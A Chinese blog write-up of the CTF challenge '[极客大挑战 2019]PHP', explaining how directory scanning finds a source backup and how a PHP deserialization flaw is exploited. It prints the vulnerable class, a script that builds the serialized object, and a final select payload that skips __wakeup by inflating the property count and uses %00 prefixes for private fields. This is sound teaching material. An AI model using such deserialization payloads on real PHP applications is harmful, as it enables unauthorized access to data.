- 1接上文AI电销机器人-智能AI机器人源码,电话机器人源码和系统部署运行环境freeswitch_ai电销机器人源码
- 2Pig的安装及基本使用
- 3多旋翼无人机振动分析与减振方法_无人机振动原理
- 4云计算基础架构服务平台
- 5Spring、SpringMVC、SpringBoot三者的区别_spirng springmvc spring boot的关系和区别
- 6AWS SAP-C02教程4--身份与联合身份认证
- 7乐玩插件和大漠插件哪个好_教您用好Home Assistant各种插件系列之媒体播放器插件DLNA_DMR...
- 8Centos7离线安装zookeeper
- 9ESP32编辑笔记(9)——Smartconfig_smartconfig esp32
- 10[线段树]*区间涂色* 洛谷P2161
[极客大挑战 2019]PHP 1——php反序列化_极客大挑战php1
赞
踩
首先根据题目的提示,我们用dirsearch扫目录,扫到备份文件www.zip。
于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,
打开flag.php,发现是个假文件
打开index.php,
发现一段php文件,包含class.php文件,用get的方式传入一个select参数,并将结果反序列化(unserialize)
打开class.php文件进行审计
<?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if ($this->password != 100) { echo "</br>NO!!!hacker!!!</br>"; echo "You name is: "; echo $this->username;echo "</br>"; echo "You password is: "; echo $this->password;echo "</br>"; die(); } if ($this->username === 'admin') { global $flag; echo $flag; }else{ echo "</br>hello my friend~~</br>sorry i can't give you the flag!"; die(); } } } ?>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
根据代码的意思,我们可以发现如果username=admin password=100然后我们再执行__destruct()时可以获得flag.
因此我们需要构造反序列化。替换select参数,输入admin和100.
<?php
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name('admin', 100);
var_dump(serialize($a));
?>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
保存,然后获得序列化后的字符串:O:4:“Name”:2:{s:14:“Nameusername”;s:5:“admin”;s:14:“Namepassword”;i:100;}
我们将用这串序列化的字符串替换select,但问题是,当执行反序列(unserialize)时,会首先执行__wakeup()魔术方法,这个方法会把我们的username重新赋值,所以接下来,我们要考虑如何跳过__wakeup(),去执行_destruct
在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup(),去执行__destruct
于是我们这样构造pyload:
?select=O:4:“Name”:2:{s:14:“Nameusername”;s:5:“admin”;s:14:“Namepassword”;i:100;}
然后我们又意识到,这个变量时private
private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度
于是我们在构造一回pyload:
?select=O:4:“Name”:3:{s:14:“%00Name%00username”;s:5:“admin”;s:14:“%00Name%00password”;i:100;}
